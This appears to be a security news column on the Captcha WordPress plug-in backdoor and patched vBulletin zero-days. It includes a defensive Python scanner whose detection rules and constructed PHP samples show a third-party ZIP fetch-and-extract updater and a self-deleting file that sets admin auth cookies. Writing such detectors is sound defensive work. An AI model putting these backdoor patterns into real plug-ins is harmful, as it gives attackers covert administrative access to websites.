Yet Another WordPress Extension Changes Owner and Gets Backdoored

A WordPress plug-in called Captcha with more than 300,000 active installations contained a backdoor that allowed its maintainer to gain unauthorized administrative access to other people’s websites.

The plug-in was apparently backdoored after its previous developer sold it to unspecified new owners in September. This is not the first time a popular piece of software has been used maliciously after a change in ownership and highlights a larger problem with the software supply chain.

The Captcha plug-in was removed from the official WordPress repository recently and its new owners, an outfit called Simplywordpress, claimed that the reason was a trademark issue, with WordPress asking them to change their name.

Researchers from Web security firm Wordfence didn’t buy that explanation and decided to investigate the plug-in to see whether the removal was actually due to a security issue. Sure enough, their suspicion proved correct when they found that a backdoor had been added to the plug-in code.

Specifically, the latest plug-in version contained an automatic update process that downloaded a ZIP file from a third-party URL and extracted it over the Captcha plug-in installed on the site. WordPress plug-ins normally get updates through the official WordPress repository, so the presence of code that downloads a new plug-in version from a third-party URL was suspicious in itself.

It turned out the rogue version in the ZIP archive included a file called plugin-update.php that, when executed, generated an administrative session, set authentication cookies and then deleted itself. Furthermore, the new code implemented an update process that, when triggered, downloaded a clean copy of the plug-in and replaced the rogue one, deleting all traces of the backdoor.
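The two-stage pattern described above (an updater that pulls a ZIP from a non-WordPress host and unpacks it over the plug-in, followed by a file that mints a logged-in session and removes itself) is something a site owner can look for on disk. The scanner below is an added example for this article, not code from Wordfence or from the Captcha plug-in. It assumes the backdoor used ordinary WordPress helpers such as `download_url()`, `unzip_file()` and `wp_set_auth_cookie()`; the article does not name the exact calls, and a real backdoor may obfuscate them, so a clean scan is not proof of a clean plug-in. The plug-in files it scans are constructed samples written to a temporary directory.

```python
"""Heuristic scan of a WordPress plug-in directory for the out-of-band update
and self-deleting session-minting pattern described in the article.
Added example; the function names below are assumptions, not from the page."""
import re
import tempfile
from pathlib import Path

# (rule name, regex, why it matters). Constructed heuristics, not a signature set.
RULES = [
    ("remote_zip_fetch",
     re.compile(r"(download_url|wp_remote_get|file_get_contents|curl_init)\s*\(\s*"
                r"['\"]https?://(?!(?:downloads|api)\.wordpress\.org/)[^'\"]+\.zip", re.I),
     "fetches a .zip from a host other than wordpress.org"),
    ("unzip_over_plugin",
     re.compile(r"unzip_file\s*\(|new\s+ZipArchive", re.I),
     "extracts an archive on the server"),
    ("sets_auth_cookie",
     re.compile(r"wp_set_auth_cookie\s*\(", re.I),
     "creates a logged-in session outside the normal login flow"),
    ("self_delete",
     re.compile(r"unlink\s*\(\s*__FILE__\s*\)", re.I),
     "file deletes itself after running"),
]


def scan_source(src: str) -> list[str]:
    """Return the names of every rule that matches one PHP file's source."""
    return [name for name, rx, _why in RULES if rx.search(src)]


def is_suspicious(hits: list[str]) -> bool:
    """Flag the two combinations the article describes: fetch+extract from a
    third-party URL, or a session-minting file that removes itself."""
    s = set(hits)
    return ({"remote_zip_fetch", "unzip_over_plugin"} <= s
            or {"sets_auth_cookie", "self_delete"} <= s)


def scan_plugin_dir(root: Path) -> dict[str, list[str]]:
    """Walk every *.php file under root; map relative path -> matched rules."""
    findings: dict[str, list[str]] = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_source(php.read_text(errors="replace"))
        if hits:
            findings[php.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample plug-in: one benign file, one out-of-band updater and one
# self-deleting session file. Variables are deliberately left undefined so the
# fragments are recognisable to the scanner but do not run as real PHP.
SAMPLES = {
    "captcha/captcha.php":
        "<?php\n/* Plugin Name: Example Captcha */\nadd_action('init', 'example_captcha_init');\n",
    "captcha/updater.php":
        "<?php\n$tmp = download_url('https://example.com/captcha-latest.zip');\n"
        "unzip_file($tmp, WP_PLUGIN_DIR . '/captcha');\n",
    "captcha/plugin-update.php":
        "<?php\nwp_set_auth_cookie($user_id);\nunlink(__FILE__);\n",
}


def demo() -> dict[str, tuple[list[str], bool]]:
    """Write the samples to a temp dir, scan them, and report per-file verdicts."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in SAMPLES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        findings = scan_plugin_dir(root)
    return {path: (hits, is_suspicious(hits)) for path, hits in findings.items()}


if __name__ == "__main__":
    for path, (hits, flagged) in demo().items():
        print(f"{'SUSPICIOUS' if flagged else 'note':10} {path}: {', '.join(hits)}")
```

Run it against a real `wp-content/plugins` directory by calling `scan_plugin_dir(Path('wp-content/plugins'))`; anything flagged deserves a manual read, and the wordpress.org exclusion is there only because that is where legitimate plug-in updates come from.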

“The backdoor installation code is unauthenticated, meaning anyone can trigger it,” the Wordfence researchers said in a blog post, adding that they will release a proof-of-concept and more details after 30 days to give users time to remove the plug-in from their websites.

This is not the first time malicious or spam code has been added to a popular WordPress plug-in after it was bought by a new owner. It seems to be a relatively common technique that allows infecting a large number of websites with a one-time investment.

The same has happened with browser extensions, and it could conceivably happen with any popular third-party SDK, library or other component that developers incorporate into their applications. Not being able to trust that a new version of a component is clean is a serious problem, because that distrust could also discourage developers from keeping up with critical security fixes in third-party libraries.

VBulletin Patches Zero-Day Remote Code Execution Flaw

Developers of vBulletin, a proprietary internet forum platform used on tens of thousands of websites, issued emergency patches to fix two serious vulnerabilities that were publicly disclosed last week.

VBulletin Solutions, the company that develops the software, advised users Tuesday to upgrade to vBulletin 5.3.4 Patch Level 1, vBulletin 5.3.3 Patch Level 1 or vBulletin 5.3.2 Patch Level 2 as soon as possible.

The two vulnerabilities were disclosed last week through Beyond Security’s SecuriTeam Secure Disclosure program after repeated attempts to contact vBulletin since November reportedly failed. One of the flaws could allow unauthenticated attackers to delete arbitrary files from a vBulletin installation, while the other could allow attackers to execute arbitrary code on Windows-based web servers.

VBulletin is used by more than 100,000 websites, including many operated by well-known companies and organizations such as Zynga, Electronic Arts, Sony Pictures, NASA and Valve Corporation. Attackers have exploited vBulletin vulnerabilities in the past to compromise very large community forums, including Ubuntuforums.org.

Since these two new vulnerabilities were disclosed last week and vBulletin only released patches for them Tuesday, they had zero-day status for several days and might have already been used in attacks. If you’re a vBulletin user make sure to check your web server logs and file system for signs of compromise.

Lucian Constantin


Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42
